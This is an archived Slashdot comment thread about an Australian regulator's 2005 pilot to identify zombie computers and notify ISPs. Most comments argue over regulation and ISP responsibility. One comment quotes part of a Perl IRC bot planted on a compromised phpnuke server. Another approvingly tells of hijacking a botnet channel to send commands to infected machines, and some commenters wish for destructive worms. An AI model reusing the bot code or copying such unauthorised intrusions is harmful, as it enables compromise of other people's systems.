Want to read Slashdot from your mobile device? Point it at m.slashdot.org and keep reading!

 


Forgot your password?
Close
typodupeerror
×
The Internet IT

AU Government To Pilot Target Zombies 159

Posted by Hemos from the yeah-i-prefer-to-think-that-means-flesh-eaters-too dept.
msblack writes " Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"
This discussion has been archived. No new comments can be posted.

AU Government To Pilot Target Zombies More

AU Government To Pilot Target Zombies

Comments Filter:

  • No regulation for me. (Score:5, Insightful)

    by jellomizer ( 103300 ) * on Monday November 07, 2005 @08:58AM (#13968647)
    "When will U.S. regulators"..."get on board?"

    Well I hope never. ISP should have rights to protect their network so they should be allowed to stop Zombie systems when they feel like it. But for U.S. regulation. I say No way. All regulation does is make loopholes for the bad guys and road blocks to the good guys. ISP should be willing to work with their customers to insure this doesn't happen, that is why a lot of ISP are offing free protection software to their windows users, partially because other big names are doing it so they can stay competitive, and partially because with less spam and viruses on their network they can more easily manage it. With US Government control it will be like your system is a Zombie and Fix it. To most people who only have a passing idea what a virus or spyware/addware is, most really won't know much how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hireing expensive techs to fix it they will toss their computer saying it is broken, or sue ISPs and the Government for disconnecting their ISP without giving them a means to remove it. Also systems like P2P, BitTorrent, and some distributive computing systems, all with legal uses, could be considered a zombie system to some some people like the Entertainment industry and can use that to force all people using the technology even for non entertainment uses (such as downloading Linux distros)
    Government control adds rigidly defined rules to a flexible universe and often will cause more harm then good.
    • Too bad, in reality, trying to block a customer or even educate him will make you lose a client. People will argue that they run anti-virus software and are clean; no amount of evidence is going to persuade them. Thus, you have the choice of either pampering them or letting them go.

      I do some consulting for a couple of local ISPs -ie, I'm the guy who tells people who run them how to set up traffic shaping, firewall rules, etc. And generally, whenever the network gets stuffed with worms, we just block the
      • Good point. To bad there isn't a way to make people realize that Virus protection and anti-spyware, and software firewalls are not the silver bullet to keeping your computer free of viruses and other nasties. These are tools that can give you some relative safety and it is better then nothing but it is like Armor (Either todays Body Armor or the old suits of armor of old) they are better then nothing but still you can get hurt, or killed. Maybe in a couple generations we will be able to get people who ar

      • Re:No regulation for me. (Score:5, Insightful)

        by misleb ( 129952 ) on Monday November 07, 2005 @03:29PM (#13972143)
        This isn't true. I worked for an ISP which was dilligent about working with customers to clean up PCs. They are surprisingly coorporative. They don't like the idea of their computer be infected any more than you do. You just have to be diplomatic about it. Don't blame them. Just give them the tools to clean and keep clean their computers.

        -matthew
        • The added benefit of having a document from a recognised regulatory authority is that it corroborates your actions and enables the commercial provider to redirect any criticisms to the government authority.

          Claims that having government body monitoring complaints of illegal actions and spam and taking the proper action of notifying the isp so that action can be taken to prevent further harm to other users and enable the person whose computer is infected from regaining the privacy , are somehow controlling

    • To most people who only have a passing idea what a virus or spyware/addware is, most really won't know much how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hireing expensive techs to fix it they will toss their computer saying it is broken

      This is, of course, greatly to be encouraged. The more lusers decide their computers are irreparably broken just because of some worm, the more perfectly good m

    • And you nailed it - the problem is what the definition of a "zombie" is. I'm pretty sure they could make a good case for just about anything.

      We don't need that kind of regulation. No way.
      • And you nailed it - the problem is what the definition of a "zombie" is. I'm pretty sure they could make a good case for just about anything.

        Well, if the computer eats your brain, it is probably a zombie computer.

      • Attention: "B Network" Users:

        Your PCs have become infected with ZOMBIES and ALIEN VIRUSES
        and are about to be eaten by an Enormous Mutant Star Goat
        or something about like that.
        To protect yourself, please put the PC out at the curb
        and email us with your street address,
        and we'll disinfect it for you and return it in a couple of weeks.

        Thank you,

  • Don't forget the other monsters (Score:4, Funny)

    by LiquidCoooled ( 634315 ) on Monday November 07, 2005 @08:59AM (#13968651) Homepage Journal
    Zombies are just one type, we need to start identifying the Vampires and ghouls.

    They cause MUCH more havoc than simple zombies.

  • Re: (Score:2, Funny)

    by account_deleted ( 4530225 )
    Comment removed based on user account deletion

  • dangerous (Score:5, Interesting)

    by Anonymous Coward on Monday November 07, 2005 @09:03AM (#13968672)
    and how long will it be before they ask my ISP to disconnect me because I'm running P2P software, making me a dangerous music thief?

    slippery slope!

  • When will people learn? (Score:4, Insightful)

    by Poromenos1 ( 830658 ) on Monday November 07, 2005 @09:04AM (#13968674) Homepage
    Seriously, how hard is it not to press the big red "No" button on a dubious site that asks you to install software that tracks the weather/vaccums your carpet/makes coffee? The warning is quite clear on all the browsers, I think, why are people still doing it?
    • Because sometimes the clicking the "Big Red No" button means you can't listen to your Sony-purchased CD. [TO be fair, Sony's software didn't zombify PCs, but it opened another door into the soul of innocent PCs through which witch doctor crackers could perform their rituals to turn them into another member of the zombie hordes]

      Not everyone is as savvy as we geeks and know the secret of holding down the shift key when inserting a CD.

      Oops, did I just say that out loud?

    • Re:When will people learn? (Score:4, Insightful)

      by jdredd ( 929127 ) on Monday November 07, 2005 @09:19AM (#13968755)
      Seriously? It's hard... People don't understand the implications of clicking on the button. They just like the weather bug and other programs. Seriously too... most of that crap isn't going to be installed via a nice popup box that lets you decide. Go look at all the browser security holes, viruses, and worms in the last 3 years that allow for installation of backdoors, SMTP engines, and more. As long as people make money via phishing, selling herbal viagra, and telling you how to lengthen your penis, you will be fighting this crap. It's moved from people doing it for kicks to people doing it for money and identity theft - well, that's for even more money. It doesn't take much money to create a virus or worm. There are plenty of people out there that will do it for a little cash. The window of time between when patches come out and exploits for the hole has shortened drastically over the last couple of years... from months to days. You want a shock? Go run AdAware or Spybot Search & Destroy on your parents' computer. Then make sure to educate them about phishing before your inheritance disappears.
    • True, but you'll still be amazed at how much of the general population still don't even realise the dangers of said weather-tracking/carpet-vacuum/coffee making advertisements though. These people are exactly what popupspam companies like to target - because it's just too damn easy.
    • Installing our advertisement program will help make us rich. Some people think we shouldn't be rich. These people need to be proven wrong by installing our program. Do you want to stop them too?

      Stop?
      [No] [Yes]
    • Because not choosing the default answer can leave to heartache. When everything on the screen is considered technogarble then just do what the bright young and intelligent programmers want them to do anyways. They figure if you say no your program wont run.
    • The answer is simple. There is at least one site where they have to say 'Yes': Windowsupdate. There are others too, where if you don't say 'Yes' then you don't get what you came for. That's what makes it hard for them to press the 'No' button. The average computer user is not good with rules that change with different circumstances. If they have to hit 'Yes' when they see the question on one web site, they like to go on autopilot and apply that same rule anywhere else they see it. Otherwise they'd have to s

    • Re:When will people learn? (Score:1, Interesting)

      by Anonymous Coward
      I've been meaning to write an anti-spyware Internet Exploder patch for a long time now:
       
      It would patch the "You are about to install..." dialog, so instead of saying "Yes" and "No", the buttons would say, "No" and "FUCK No!"
    • People actively allowing malware to enter their systems isn't even the biggest problem. Have you read the stories about Windows XP machines getting infected within 15 minutes of having received a fresh install? I have, and I have seen it happen in real life, too.
    • I'm pretty sure (sarcasm) that in the past, there's been a number of IE vulnerabilities that allow this crap to be installed without any user notice. And it might not even come in with IE - it might come in some other way that the user is completely unaware of.
    • Why do people drive drunk?

      Why do people speed?

      Why do people not signal their lane changes?

      People are going to make mistakes, whether it be malicious, idiocy, or the warm coating of ignorance, they will do things that can potentially harm others. There are laws against most of the things people can do to harm others, but not yet on the Internet.

      Why is this? Why must I put up with having my cable modem constantly being scanned? Why, when there is nothing happening on my system, can I generate a several-meg
  • Pilot Target Zombies Yup we're flying these new fangled target zombies around.

  • USA ISP's (Score:4, Informative)

    by vasqzr ( 619165 ) <vasqzr@noSpaM.netscape.net> on Monday November 07, 2005 @09:06AM (#13968686)
    In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?

    Our local cable and DSL providers are always shutting connections off for userse who's computers are virus-ridden. If your PC is acting as an open spam proxy or found to be connecting to zombie-networks, they shut you off, and you have to call to find out why. They recommend a service or software to help clean your PC, and they won't let you back on until you're free of any malware.

    It's been like this for...years?
    • Yeah it's been the same way as well for at least the past 3 years my local cable internet provider company...
    • That is a great ISP, but..

          How are they to download the service or software, if the ISP cuts them off?

      I am all for closing these pests down, but you have think of the user trying to fix something that now can not be fixed. Maybe isolating them to a micro-net that has one server with the required fixed software loaded. Basicly, ANY webapge they ask for, comes back with a fix it page with a valation link to get them reworked up.
    • But if they shut you off, how much of a chance do you then have to download malware-scanners, documentation etc? Better to cut of everything but HTTP to a provider-supplied repair kit, IMHO.

  • They won't (Score:5, Insightful)

    by keraneuology ( 760918 ) on Monday November 07, 2005 @09:06AM (#13968687) Journal
    When we still have (at least one) state attorney general who believes that spam is protected by the first amendment, government regulators won't get involved. Except possibly during an election year when they might pass a toothless law that does nothing but confuse the confused.

    Pure, raw, unadulterated situation: congress doesn't care. The big ISPs don't care. They have had 10 years to address the situation and have refused all along. They are, however, willing to pass laws preventing unsecured wireless access points. Given a choice between lending support to MPAA/RIAA or actually addressing a serious problem, be it hacking, phishing, worms, viral attacks, DDOS attacks or any other legitimate issue.... look at it like this: how quickly have they acted to prevent the zombie issue? How quickly did they act to try and sneak the broadcast flag into law. Again? Or again?

    Start writing campaign checks and picking up the tab for "fact finding missions" to Hawaii for a senator or ten... then you might find some interest on the hill.

  • I got excited for a second (Score:5, Funny)

    by illtron ( 722358 ) on Monday November 07, 2005 @09:07AM (#13968698) Homepage Journal
    I got my hopes up for a second. I though, "Finally! Those fat cats in Canberra are taking some action to prepare for the immanant impending zombie pandemic."

    My elation was premature. This is just some lame story about computers sending spam.

    Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
  • It would be cool if ISPs proposed some anti-malware strategies to their customers, maybe send some Linux distro :)

  • Carte Blanche for ISPs? (Score:4, Insightful)

    by badzilla ( 50355 ) <ultrak3wlNO@SPAMgmail.com> on Monday November 07, 2005 @09:10AM (#13968709)
    From TFA: Anthony Wing, manager of the anti-spam team at the ACMA [said] that the application, which took "some months" to build, can identify computers [...] that are being used for "illicit reasons".

    I agree botnets are a problem and that my ISP has a right to stop me from being a nuisance to the rest of the internet. But outside of that do I really want my ISP taking broad arbitrary decisions on what I can do with my connection?

  • We should be able to find a technical solution to this without having to get the government involved in what amounts to censorship. I'm not saying we don't have a problem, but I am confident that the last thing we want is to have hundreds of additional employees at the FCC regulating traffic on the internet and sending nasty letters to people asking them to conform or be disconnected.

    Think about what would happen if the FCC were running around sending letters to people about computers that might be sending
    • It would be nice if our ISPs would take a bigger hand in protecting their users. Handing out anti-malware software is a step, but there is a portion of users who get infected anyway, because of poor surfing habits or ignorance about their own computers. I want my local ISP to inform their clients that they are "infected," at least according to the ISPs definition.

      Government regulation? Not the best way to go about solving the problem. Static rules enforced over a wide spectra of communities will creat

  • Headline should read (Score:2, Insightful)

    by gtoomey ( 528943 )
    "AU government to target Microsoft's indifferent security"

  • Zombies...? (Score:3, Funny)

    by __aaclcg7560 ( 824291 ) on Monday November 07, 2005 @09:12AM (#13968722)
    How many zombie movies do we need to point out that the government experimenting on zombies is very dangerous and foolish? Get rid of the zombies with a bullet or whack to the head and be happy.
  • Comment removed based on user account deletion
    • If people with brains set abuse policy at ISPs, they would not have to monitor or go looking for infected machines. http://www.spamcop.net/ [spamcop.net] notifies hundreds of ISPs daily that machines in their network are spam bombing the world, and most (especially the big ones, like Comcast and Roadunner), do not do squat about it.

      Policy should be: "If your machine sends spam, even without your knowledge, you WILL be disconnected."

      Same policy should apply to virus-infected machines, but the big ISPs just do not give a f

  • This is foolproof (Score:5, Insightful)

    by Dekortage ( 697532 ) on Monday November 07, 2005 @09:13AM (#13968726) Homepage

    From the article: "Anthony Wing, manager of the anti-spam team at the ACMA, told ZDNet UK sister site ZDNet Australia that the application, which took "some months" to build, can identify computers physically located in Australia that are being used for "illicit reasons".

    "[The application] identifies IP addresses that have been used for illicit reasons -- for example spamming," Wing said. "There are a range of sensors around that world that identify them. Those infected IP addresses are then fed to the relevant ISP. They know who their customers are so that can contact them... if the computer remains a threat to other Internet users, the ISPs may take steps under their acceptable use policy to disconnect the computer until the problem is resolved".

    ...The ISPs will then be responsible for contacting their customers and helping them disinfect their computers.

    This is great, assuming that:

    1. Hackers won't get a copy of this software and find ways of circumventing it.
    2. "Illicit" computer operators aren't spoofing their IP addresses [linuxsecurity.com].
    3. ISPs don't abuse the interpretation of the words "threat" or "acceptable use".
    4. The process of "helping" users disinfect computers does not compromise user's privacy.

    • Umm...

      Spam sending zombies cant spoof IP addresses. The TCP based SMTP connection requires two way communciation that isnt possible with a spoofed address.

      A DDOS is different however, you can spew out all sorts of invalid and malicious packets.

      • Re:This is foolproof (Score:4, Insightful)

        by KiloByte ( 825081 ) on Monday November 07, 2005 @09:40AM (#13968865)
        Any ISP with a clue will notice that a packet with source address outside of their network simply couldn't originate there. Allowing any spoofed traffic to leave into the world is nothing but incompetence on their part.
        • Best Current Practices RFCs for ISPs recommend that they block traffic from forged addresses - especially from end customers, which is the easy case, but also blocking forged-address traffic from other ISPs to the extent that that's possible. On Cisco routers, URPF (Unicast Reverse Path Forwarding, IIRC) is an efficient method of blocking forged traffic from end users - basically, if a packet claims to be "from" a given IP address, the interface card on the ISP's router will reject the packet unless the sa
    • A common misconception is that "IP Spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth.

      And for this, you get an Insightful mod? From your own link:
      A common misconception is that "IP Spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth.

      • And from my own link: "IP spoofing is almost always used in denial of service attacks (DoS), in which attackers are concerned with consuming bandwidth and resources by flooding the target with as many packets as possible in a short amount of time." And distributed DoS (DDoS) attacks are almost certainly the second most common use of zombie PCs, after spamming.

    • Read the article again, folks: "IP addresses that have been used for illicit reasons -- for example spamming." (emphasis added)

      The Aussies are after all kinds of zombies, not just spam zombies. Zombie PCs can be (and have been) used to launch DDoS attacks -- and IP spoofing works just fine for these purposes. I said illicit computer operators could spoof their IPs, not that they could spoof it to send spam. Read more carefully!

  • Carrot and Stick is the key (Score:3, Insightful)

    by putko ( 753330 ) on Monday November 07, 2005 @09:15AM (#13968739) Homepage Journal
    If there are the right incentives, the zombie problem will go away.

    E.g. if the user somehow feels it is necessary, he'll take care of his machine.

    I know of people who know full well their computer will get infected with malware. They do it anyway, because they figure it won't cost them anything. Their ISP won't bug them, nor the phone company, nor anyone they DDOS, etc. They simply don't care.

    That's why I want multiple waves of hardware-destroying worms. Worms that ruin your mobo month after month, until people wake up and see that proper administration is good for them too.

    Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can do is disconnect it, and that just leads to support calsl and whining from the (l)user. Which is why it isn't done (duh!)

    • Yeah, some good ol' fashioned payloads would be good to see, who can remember the one that would drive your moniters refresh so high it would destroy your moniter? or "flash-upgrade" each and every piece of hardware it could find?

      However we won't see any of these anymore, virus writeing is now a proffestion, you do it to make money not to see how many peeps you could piss off.

      What is the world comming to ;(
    • Which is why the fine needs to be more than is lost by losing the customer or dealing with his whining.
    • All it can do is disconnect it, and that just leads to support calsl and whining from the (l)user. ... and to lusers leaving you like a leaky ship. They just _hate_ being educated.

      In many cases, you can block the relevant ports. 135, 137-139, 445, 5000 are among those that can be shut without any users even noticing. Blocking 25 would help, but you can't do that unless you're a monopoly. But, there is a trick out here -- count outgoing mails (-p tcp --dport 25 --tcp-flags SYN,ACK,FIN,RST SYN) and enact
      • Blocking 25 would help, but you can't do that unless you're a monopoly.
        That depends on how you define monoply, if you define it as the only ISP that a user is subscribed to, you can block all you want.
        If example.com wants to block port 25 to any computer except mail.example.com it would effect very few users. I would think that off by default would be a good policy for most ports, if I want an unusual port turned on, I'd be happy to explain why and even take a test to demonstrate competency to admin service
    • That's why I want multiple waves of hardware-destroying worms. Worms that ruin your mobo month after month, until people wake up and see that proper administration is good for them too.

      A worm that is so destructive wouldn't propagate very easily, now would it?

      Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can

      • "A worm that is so destructive wouldn't propagate very easily, now would it?"

        Destructiveness doesn't limit propogation.

        Look at AIDS -- quite destructive. It just kills you after you've spread it to your buddies.

        Propogation is helped by animals/computers being able to share things like fluids/data with each other. So WWI was good for breeding a nasty flu, because the hosts were all crammed next to each other. Same for fish ponds: fish diseases/parasites do very well.

        A computer network where so many computer

  • Censorship? (Score:5, Insightful)

    by Zontar The Mindless ( 9002 ) * <plasticfish.info@ g m a il.com> on Monday November 07, 2005 @09:20AM (#13968764) Homepage
    I think not. Free speech does not include the right to shout "Fire!" in a crowded theatre, and free use of the Internet does not include the right to allow your machines to stuff it up for the rest of us.

    As a Telstra customer who saw his cable connection slow to about 1/100th of its normal speed thanks to the DNS attacks of a few months ago, I'm glad to see someone doing something about the problem.
    • Actually Free Speech can be viewed as a Cost issue.

      1) If I stand a street corner yelling "The end is near.". I am under free speech, becuase the cost of the listener is 0.

      2) If I call you up and said "The end is near.". I am costing you a little of your fixed cost of a phone line.

      3) If I fax you and wrote "The end is near.". I am costing you a little fixed cost of the phone line, AND the cost of paper & toner, plus some life of your machine.

      In all cases above the message is one directional, I am not
    • It isn't nessicarily censorship, but it can be censorship, and probably will be censorship!

      Who is overseeing and investigating the government black-list of Internet users? What recourse will a person have if there has been an "error" in identifying you as a "Zombie"? What techniques does the government use to identify Zombies, and how do we know they won't get a bunch of false positives?

      Normally, in a court of law, the government has to prove you guilty beyond any reasonable doubt before they can take sanct
      • I would mod parent Insighful had I not already posted to this story. Rex raises some valid concerns, and I forget that I no longer live in a country which has a secret "no-fly" list.

        However, I'd like to point out a couple of things:

        "Innocent until proven guilty" - When you're driving and speeding or operating recklessly, the police do have a right so stop you, cite you, make you stop driving, and even take you in. If you're operating in a fashion which they deem is illegal and/or unsafe, they're allowed to

  • Why don't they target IRCops? (Score:5, Interesting)

    by t0qer ( 230538 ) on Monday November 07, 2005 @09:34AM (#13968836) Homepage Journal
    I'm a broke geek. I host my website on a machine on a machine in my house. Last few weeks i've caught my machine being used for zombie purposes. Attack vector was a vulerability in phpnuke.

    Let me explain "why I use that holy peice of shit"

    The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)

    So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.

    Ok.. SSH into the machine. Same as before, same exploit.

    poo:~# ls /tmp -al
    total 20
    drwxrwxrwt 5 root root 4096 Nov 6 14:55 .
    drwxr-xr-x 22 root root 4096 Sep 16 14:38 ..
    drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
    drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
    drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl

    Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.

    Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.

    Finally I looked at bot.txt.

    # IRC
    my @adms=("bigfirex"); #nick dos administradores
    my @canais=("#testebot");
    use LWP::Simple;
    my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
    my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
    my $ircname = $dados;
    chop (my $realname = `uname -n`);
    $servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
    my $porta='6667'; #porta do servidor d irc

    Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.

    I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"

    I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.

    I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.

    I did a /who 0 and found an IRC op from IGS.ca Below is a log of the chat I had with him.

    [msg(elsif)] hi are you an ircop?
    [elsif(jake@admin.igs.ca)] sure
    [msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
    [msg(elsif)] The bot is being run by a user named .bigfirex. in a channel called #testebot.
    [elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
    [msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
    network
    [elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
    [elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their

    • Re:Why don't they target IRCops? (Score:5, Interesting)

      by ivan kk ( 917820 ) on Monday November 07, 2005 @10:37AM (#13969212)
      By posting on slashdot, at least the odd geek or two will be sure to send off a few msgs to the ircops.

      However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsibile for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?

      This actually happened to me once. One of my friends machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
      I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be their, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
      Turns out it was a couple of malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
      Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
      Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).

      Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
      Good luck with it.

    • Re:Why don't they target IRCops? (Score:4, Insightful)

      by spinfire ( 148920 ) <dpn@isomerica.net> on Monday November 07, 2005 @10:47AM (#13969286) Homepage
      The IRCop is right. It is very difficult to track this stuff down, and it is a pain. Believe me, if I was in his position I'd be pretty ticked at you, as your compromised machine was reponsible for abusing his network and it even looks like your box got banned from the network. You're even guilty of ban evasion!

      I am an IRCop on a very small network which had a botnet problem last year. Hundreds and hundreds of bots would connect, all joining channels. We wrote scripts to ban all the bots, upgraded services, the whole lot. They keep coming. Some of them came to new channels. The "owners" hadn't showed up at this point, not even once. After around 5 days some people showed up in those channels from ISPs in the middle east. I did track them down, and sent abuse emails to their ISPs. Got a response in a few days, offending account shut down. But that account was probably another 0wned box anyways.

      Unfortunately sending ISP abuse emails to all of the bot IPs was much too daunting a task for a small time IRC network.

      Keeping unwanted things off an IRC network is hard work. Kiddies often have hundreds of open proxy and otherwise usable IPs to use for ban evasion.

      I hate to be brutally honest, but you share a lot of responsibility. *Your* IP was abusing his system.

      • Believe me, if I was in his position I'd be pretty ticked at you, as your compromised machine was reponsible for abusing his network and it even looks like your box got banned from the network. You're even guilty of ban evasion!

        Let me get this straight: A guy finds out that his machine has been compromised. He does the right thing and reports it to the admin who is responsible for maintaining the resource from where the attack was launched. He even goes out of his way to do so. And you would be ticked

        • No; He reported it to somebody who was being attacked by the same person. And, if you knew anything about IRC you'd know it is awfully difficult to keep bad guys off your network when there are so many open proxies. If a cracker tried to use this person's network to run a botnet, they already had their hands full trying to keep all of the bots from DoSing the network.

          This person didn't try to "report it to the admin who is responsible for maintaining the resource from where the attack was launched." He
          • One thing that he could have helped with was an IP for the bot master. That at least would have led the investigator to the next layer. I agree a k-line would be evaded, but the goal should be to find these guys in real life and get the feds on them...
  • > When will U.S. regulators ... get on board?

    Never, I hope. Do you want to be forbidden to use an unlicensed operating system?

    Hint: I think you meant to write "law enforcement" rather than "regulators".
  • What are the privacy implications of a government doing this?

    I am all for some sort of system that finds a way of shutting down bots and will even admit that I would not mind seeing user's required to care for their computers (making them responsible for what is on their machines). Having said that, my experience is that so far in the cyber-world, governments have not been able to pass legislation that deals with these kinds of things in an effective manner. Governments are too much "brick and mortar" to

  • The money flow (Score:4, Insightful)

    by silverbax ( 452214 ) on Monday November 07, 2005 @09:52AM (#13968951)
    "When will U.S. regulators ... get on board?"

    Never , because alll U.S. lawmakers are in the pocket of Big Zombie.

  • When hell will freeze over (Score:3, Insightful)

    by Pig Hogger ( 10379 ) <pig.hogger@g[ ]l.com ['mai' in gap]> on Monday November 07, 2005 @09:55AM (#13968963) Journal
    When will U.S. regulators and ISPs get on board?
    When the MBAs and marketers will finally be lined against the wall and shot (so they won't keep forbidding it because it's not good for the bottom-line), which will be never, as the greedy US loves too much money for it ever to happen.

  • I'm on this task squad (Score:3, Funny)

    by Anonymous Coward on Monday November 07, 2005 @09:55AM (#13968966)
    Ok, I'm sory guys, it's time for me to fess up. I'm on this task force and what actually happened was this. Me and the other sys admins for the AU Gov were sitting around playing DooM when our Boss walked in and yelled "what the hell are you guys doing?! The good tax payers aren't paying you to play games..."

    We had to think of something quick so I told him we were cleaning infected zombies from the network, which, if you think about it, is at least partially accurate. He then left muttering something about "keep up the good work" and next thing I know suddenly all the other managers and politicians want their networks cleaned. Now it's a national headline.

    Hey! My bad! ;-)

  • When will U.S. regulators and ISPs get on board? (Score:5, Insightful)

    by Yonder Way ( 603108 ) on Monday November 07, 2005 @10:11AM (#13969052)
    Hopefully never. Well, U.S. regulators anyway.

    ISP's should be protecting their own networks. Saved bandwidth costs alone should be enough reason for them to want to detect and block zombies. The last thing we need is more government intervention.
  • Firstly, having SPAM/DOS attacks going out of your network cant be good for PR or business.
    But more to the point, having this stuff on their network spewing data chews up bandwidth (and bandwidth isnt free)

    A good place to start is for ISPs to block ports known to be used by these zombies (e.g. the port that the "owners" of the zombie network use to send commands/targets/spam messages etc to the zombies). Blocking these ports probobly wouldnt cost very much and would (in theory) stop the zombies from actuall
  • Is it illegal for me to make my own network into bots for distributed computing? Will I need a "bot license"? Maybe notification is a government service, but mandatory bot disconnection is invasion of my privacy. And with government's error rates, it's another threat to my nonbot computers.
  • Oooh... the slashdot quandry. Either the ISPs can tell you what you can send and receive over the network (which means they can tell you not to use P2P); or they can't tell you what you can send and receive over the network (in which case they can't do anything about the botnets).

    Personally (and as a network sysadmin for a building network... not an ISP, but close) I'm all for restrictions on what happens on the network. In my building, if I don't notice what you are doing, I'm not going to stop you; ho

  • I worked for a small ISP in the US and we were dilligent about getting users to clean their PCs. If they didn't comply, their service got turned off until they could. Primarily we used IDS to detect zombies and such. But sometimes they would actually affect the service of other users. It really isn't that bad if you keep on top of it. But of course, it is a small ISP with no more than 10,000 users. Maybe Comcast, et al would find the initial task of identifying and notifying thousands of users to be daunti

  • They already do in Canada, at least some ISPs (Score:3, Informative)

    by alpha1125 ( 54938 ) on Monday November 07, 2005 @04:33PM (#13972807)
    Specifically Roger highspeed cable internet provider. They have disconnect a few of my client's computers, due to being infected with some trojan/spyware/virus etc.

    After my clients said on the phone, that "I will try and maintain a infected free computer , and run current antivirus software", they reconnect my clients.

    I don't actually so mind that they disconnect people, if they are infected with some sort of virus. Saves the rest of the people from being infect.

Slashdot Top Deals

With your bare hands?!?

Close